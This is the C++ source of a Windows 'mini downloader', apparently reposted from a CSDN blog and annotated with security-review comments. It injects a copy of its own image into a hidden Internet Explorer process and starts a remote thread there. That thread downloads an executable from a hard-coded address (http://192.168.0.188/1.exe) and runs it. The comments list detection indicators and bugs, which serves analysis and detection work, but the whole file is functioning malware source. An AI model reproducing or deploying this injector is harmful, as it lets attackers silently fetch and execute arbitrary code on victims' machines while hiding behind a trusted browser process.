


插入IE进程的下载者源代码 (source of a "downloader" that injects itself into the Internet Explorer process)

/*
"mini_downloader"
code by kardinal p.s.t
compile with vc++ 6.0
cannot run under win98;

Reviewer note: this is a process-injection downloader sample (it clones its own
image into iexplore.exe, fetches an executable over plain HTTP and runs it).
It is reproduced here for analysis and detection engineering only.
*/
#include <windows.h>

#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")

//#pragma comment(linker, "/OPT:NOWIN98")   // uncomment these four linker options and the compiled file is only about 2 KB
//#pragma comment(linker, "/merge:.data=.text")  
//#pragma comment(linker, "/merge:.rdata=.text")  
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:main")  
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")

/* Function-pointer slots filled in by download() at run time through
 * GetProcAddress, so the injector carries no static import of shell32.dll or
 * urlmon.dll.  NOTE(review): DOWNFILE is declared as returning DWORD while
 * URLDownloadToFileA returns HRESULT; same width on Win32, but its value is
 * never examined anyway. */
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );// ShellExecuteA, resolved dynamically from shell32.dll
DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);// URLDownloadToFileA, resolved dynamically from urlmon.dll
/* Globals written by main() in the injector and by download() inside the
 * target.  Because main() copies the whole image to the same base address in
 * the target, these live at identical absolute addresses in both processes. */
HANDLE processhandle; /* target (IE) process handle, opened with PROCESS_ALL_ACCESS in main() */
DWORD pid;            /* PID behind the first "IEFrame" window found by main() */
HINSTANCE hshell,hurlmon; /* shell32 / urlmon module handles set by download() in the target */

/*
 * download(): the routine executed inside the target (IE) process by the
 * remote thread that main() creates.  It is never called in the injector
 * itself.
 *
 * Resolves ShellExecuteA and URLDownloadToFileA at run time, downloads
 * http://192.168.0.188/1.exe to c:\1.exe, launches it, and terminates the
 * host process with ExitProcess(0).
 *
 * Security review notes:
 *  - Classic "downloader"/dropper payload: the file is fetched over plaintext
 *    HTTP and executed with no integrity, signature or origin check, so
 *    whatever the server (or anyone on the network path) returns is run.
 *    URL and drop path are hard-coded.
 *  - Runs in the context of iexplore.exe; presumably so the network request
 *    is attributed to IE (e.g. by a host firewall) - not verifiable from this
 *    file.
 *  - ExitProcess(0) terminates the injected IE instance, which is visible to
 *    the user and to process monitoring.
 *  - Detection indicators grounded in this code: GetProcAddress lookups of
 *    "URLDownloadToFileA"/"ShellExecuteA" from a thread that iexplore.exe did
 *    not start, a file write to c:\1.exe immediately followed by executing it.
 *
 * Correctness defects (documented, deliberately not fixed in this sample):
 *  - LoadLibrary / GetProcAddress results are unchecked; a NULL result is
 *    invoked as a function pointer and crashes the host process.
 *  - The result of URLDownloadToFileA is ignored; ShellExecuteA is attempted
 *    even if the download failed and c:\1.exe does not exist.
 *  - This is used as a thread start routine (see main()) but is not declared
 *    DWORD WINAPI (LPVOID); the LPVOID argument is never consumed.  It only
 *    works because ExitProcess never returns to the thread-start stub.
 *  - All state lives in globals at fixed absolute addresses, which is what
 *    makes the cloned image position-dependent (see the /BASE pragma).
 */
void download() //download routine used by the injected thread
{
    hshell=LoadLibrary("Shell32.dll");   // NOTE(review): NULL on failure, unchecked
    hurlmon=LoadLibrary("urlmon.dll");   // NOTE(review): NULL on failure, unchecked
   
    (FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");      // C++ reference cast to assign through the typed pointer
    (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
   
    DOWNFILE(NULL,"http://192.168.0.188/1.exe","c:\\1.exe",0, NULL);  // plaintext HTTP, HRESULT ignored
    SHELLRUN(0,"open","c:\\1.exe",NULL,NULL,5);                       // 5 == SW_SHOW; runs the downloaded file
    ExitProcess(0);                                                   // kills the host (IE) process
};


/*
 * main(): the injector.  Launches a hidden Internet Explorer, finds it by its
 * "IEFrame" window class, clones this process' entire PE image into the IE
 * process at the SAME base address, and starts a remote thread at download()
 * inside IE.  The image is linked at the fixed base 0x13150000 (see the /BASE
 * pragma) so absolute addresses in the copy are valid without relocation;
 * the technique depends on that address being free in the target.
 *
 * No API return value is checked anywhere in this function: IE not found,
 * OpenProcess denied, base address already in use in IE, a failed write or a
 * failed thread creation are all silently ignored and later calls operate on
 * NULL handles / NULL pointers.
 *
 * Security review notes:
 *  - OpenProcess(PROCESS_ALL_ACCESS) + VirtualAllocEx(PAGE_EXECUTE_READWRITE)
 *    + WriteProcessMemory + CreateRemoteThread aimed at iexplore.exe is the
 *    textbook injection chain and a strong behavioural detection signal.
 *  - FindWindow("IEFrame", NULL) returns the first matching window, which may
 *    belong to a pre-existing IE instance rather than the one launched here.
 *  - VirtualAllocEx requests a specific address; if anything already occupies
 *    it in the target (e.g. under address-space randomisation) the call fails
 *    and the remote thread is started at an address that holds no copy of
 *    our code - presumably crashing IE.  Not verifiable from this file.
 *  - The handle returned by CreateRemoteThread is never closed.
 *  - Linked with /ENTRY:main and /subsystem:windows, so the CRT is bypassed;
 *    the Sleep(5000) before return only gives the remote thread time to run.
 */
void main() //entry point (see /ENTRY:main pragma)
{  
    //1. Build the IE path and launch it
    char iename[MAX_PATH],iepath[MAX_PATH];
    ZeroMemory(iename,sizeof(iename));   // guarantees NUL termination after the 3-byte strncpy below
    ZeroMemory(iepath,sizeof(iepath));
   
    GetWindowsDirectory(iepath,MAX_PATH);
    strncpy(iename,iepath,3);            // keep only the drive prefix, e.g. "C:\"
    // NOTE(review): assumes an English "program files" directory on the Windows drive;
    // localised or 64-bit ("Program Files (x86)") layouts will not match.
    strcat(iename,"program files\\Internet Explorer\\IEXPLORE.EXE");
    //strcat(iename,"windows\\notepad.EXE");
    WinExec(iename,SW_HIDE);             // return value unchecked
    Sleep(2000);                         // fixed delay hoping the IE window exists by then
   
    //2. Get the IE process handle
    HWND htemp;
    htemp=FindWindow("IEFrame",NULL);              // first IEFrame window, not necessarily the one just started
    GetWindowThreadProcessId(htemp,&pid);          // if htemp is NULL, pid stays 0
    processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);   // NULL on failure, unchecked
   
    //3. Allocate memory in the target
    HMODULE Module;
    LPVOID NewModule;
    DWORD Size;
    LPDWORD lpimagesize;                 // NOTE(review): declared as a pointer but used to hold the DWORD read below
   
    Module = GetModuleHandle(NULL);//base address of this process' own image
    //read OptionalHeader.SizeOfImage from our own PE header
    _asm
    {
        push eax;
        push ebx;
        mov ebx,Module;                  // ebx = IMAGE_DOS_HEADER
        mov eax,[ebx+0x3c];              // eax = e_lfanew (offset of IMAGE_NT_HEADERS)
        lea eax,[ebx+eax+0x50];          // &NtHeaders->OptionalHeader.SizeOfImage (4 + 20 + 0x38)
        mov eax,[eax]                    // eax = SizeOfImage
            mov lpimagesize,eax;
        pop ebx;
        pop eax;
    };
    Size=(DWORD)lpimagesize;             // recover the value stored through the mistyped variable
    NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//reserve the same base address in the target as our image uses here; NULL if it is taken
   
    //4. Write memory, create thread
    WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//copy the whole image (code + data + resolved imports) into IE
    LPTHREAD_START_ROUTINE entrypoint;
    __asm
    {
        push eax;
        lea eax,download;                // entrypoint = &download (same address in the clone); a plain C cast would do
        mov entrypoint,eax;
        pop eax
    }
   
    // NOTE(review): download() is not a DWORD WINAPI (LPVOID) routine; the Module argument is ignored.
    CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL);    //create the remote thread at download() inside IE; thread handle leaked
   
    //5. Close handles
    CloseHandle(processhandle);
    Sleep(5000);                         // let the remote thread finish before the injector exits
    return;
};

Source: CSDN blog; please credit the original when reposting: http://blog.csdn.net/zshwlw/archive/2008/05/27/2487299.aspx

